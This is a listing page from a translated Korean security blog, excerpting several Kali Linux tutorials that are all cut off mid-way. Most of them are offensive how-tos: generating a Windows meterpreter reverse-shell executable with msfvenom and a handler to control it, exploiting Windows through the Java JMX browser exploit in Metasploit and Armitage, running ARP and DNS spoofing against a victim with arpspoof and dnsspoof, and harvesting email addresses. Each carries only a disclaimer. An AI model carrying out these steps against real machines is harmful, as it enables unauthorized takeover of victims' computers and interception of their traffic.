beauty intelligent
netdiscover tutorial :)
Security Study/Network 2016. 12. 26. 19:41

netdiscover is a network tool included by default in BackTrack 5 and Kali. It is an active/passive scanner. Let's look at how to use it. Simply entering netdiscover on its own produces output like this. For more specific usage, entering netdiscover -h shows the help; the -r option can also be used to set the address range.

Hack windows XP with armitage in kali
Metasploit 2016. 12. 23. 22:54

All responsibility lies with the user. First, run service apache2 start. Next, run service postgresql start and then service metasploit start. Then launch armitage. You will see a window like this; click connect, click yes, and wait. Hmm~~ hmm~~~ after waiting, a window like this appears. In the menu bar, click hosts -> add hosts and a dialog appears where the victim IP can be entered. After registering it, let's find out the OS: in the host tab again, click nmap scan -> quick scan (os detect) and then yes. The result can then be seen in the console window. Now, to attack using a vulnerability, what kind of..

Kali Linux by pass - Hack Windows metasploit tutorial
Metasploit 2016. 12. 22. 18:48

All responsibility lies with the user. First, run service apache2 start, service postgresql start and service metasploit start, then msfvenom -p windows/meterpreter/reverse_tcp LHOST=[attacker ip] LPORT=[desired port] -f exe > filename.exe. You can then confirm that the exe file has been created in the /root folder. Next, let's create the handler that will control it. First, enter msfconsole, then: use exploit/multi/handler, set payload windows/meterpreter/reverse_tcp [the payload we used when creating the file], set LHOST [attacker ip], set LP..

Hack windows with metasploit Java Applet JMX Remote Code Execution
Metasploit 2016. 12. 22. 03:39

All responsibility lies with the user. Please use this for research purposes only. Before starting, run the commands service apache2 start, service postgresql start and service metasploit start on Linux. Then run msfconsole. A window like the one above will appear. (The image may differ.) The next thing we need to do is create the handler. Create it with the command use exploit/multi/browser/java_jre17_jmxbean_2. As the next step, use show options to see what we need to set. First, specify the path with URIPATH. It can be / or it can be test. Not setting it..

kali linux 2.0 apt-get
Metasploit/Kali & Backtrack 2015. 12. 10. 06:37

/etc/apt/sources.list
deb http://http.kali.org/kali sana main non-free contrib
deb http://security.kali.org/kali-security/ sana/updates main contrib non-free

Using msf // How to use BeEF
Metasploit 2015. 12. 6. 22:37

A lot of information can be found with msfconsole. Beyond the information shown earlier, even e-mail addresses can be found. However, msf itself is focused on the United States, so there is not much Korean information... (Responsibility for malicious acts lies with the user.)
1. use auxiliary/gather/search_email_collector
2. set domain [domain]
3. run
BeEF
BeEF is the Browser Exploitation Framework, a tool capable of everything from gathering information about a user's PC to attacking it. It is mainly used to find XSS (cross-site scripting) vulnerabilities. So what is XSS? It is a vulnerability that triggers specific behavior through the client-side scripts used on the web. Installing BeEF!..

Arp Spoofing & DNS Spoofing
Metasploit 2015. 12. 6. 18:41

Arp Spoofing: a man-in-the-middle attack on a local area network that uses ARP to intercept the other party's data packets in transit. DNS Spoofing: an attack that tampers with the IP address delivered by the Domain Name System, or takes over a Domain Name System server, so that the user connects to an address they did not intend. Caution!! Responsibility for malicious use lies with you..
1. Start apache2 with the command service apache2 start.
2. Perform ARP spoofing with the command arpspoof -i [interface] -t [victim IP] [gatewayIP].
3. Do the port forwarding with the command fragrouter -B1.
4. dnsspoof -i [int..
